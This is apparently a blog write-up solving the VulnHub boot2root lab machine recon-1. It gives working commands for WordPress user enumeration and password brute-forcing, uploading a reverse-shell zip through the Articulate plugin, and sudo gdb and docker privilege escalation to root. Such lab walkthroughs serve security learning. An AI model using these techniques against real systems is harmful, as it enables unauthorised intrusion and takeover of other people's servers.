Updated: May 25
In this article we are going to solve another boot2root challenge recon-1 . This is a beginner level machine,we can download this machine from vulnhub.
First step is to find the IP address of the target machine using the command netdiscover -i wlan0 .
Now by using the command nmap -A 192.168.43.240 we checked for the open ports
only two ports are open 80 and 22 , so we decided to browse HTTP service.
As the title suggests that this a wordpress website so we decided to run wpscan to enumerate username using the command :
wpscan --url http://192.168.43.240 --enumerate u
here we found two users so now we decided to bruteforce password for both the users so that we can login into the admin panel of the worpdress website . command used : wpscan --url http://192.168.43.240 -U recon,reconauthor -P /usr/share/wordlists/rockyou.txt
now we open the URL http://192.168.43.240/wp-admin and login as reconauthor using the password football7 . After login into the admin panel we observe that we have no way to upload a shell like we do in other vulnerable machines .So here we decided to run dirb to find more webpages in wordpress website using the command .dirb http://192.168.43.240
we decided to open the URL /wp-content/uploads and there we found two directories .
after exploring the 2020/ directory we failed in finding any usefult thing and the direcotry /articulate_uploads is also empty so we are completely stucked here . Now we take the help of the internet and searched about articulate_uploads and find a vulnerability here. So we followed the same thing as mentioned in the exploit and make two files one is the reverse shell we downloaded from pentestmonkey and saved it as index.php and another file with name index.html as echo "<html>hello</html>" > index.html and now we decided to put these two files inside a zip file by using the command : zip exp.zip index.php index.html
Now we follow the exploit and upload the zip file .
we followed these 3 steps to get a reverse shell on our local machine ( don't forget to open the listener on the port you specified in the shell code,command used : nc -nvlp 1234)
exploit is working so now we decided to run the exploit by visiting the URL
Now we have a reverse shell as user www-data.
Now without wasting our time we decided to check sudo privileges using the command : sudo -l
and this is what we want , now we can use /usr/bin/gdb for privilege escalation and will take the shell of user offensivehack .
sudo -u offensivehack /usr/bin/gdb -nx -exec '!bash'
python3 -c'import pty;pty.spawn("/bin/bash")'
Now if check for the groups using the command groups then we can see that docker is present , So here we can use docker to get root access as show in the image.
docker run -v /:/hostOS -i -t chrisfosterelli/rootplease
we get root access and this completes our challenge!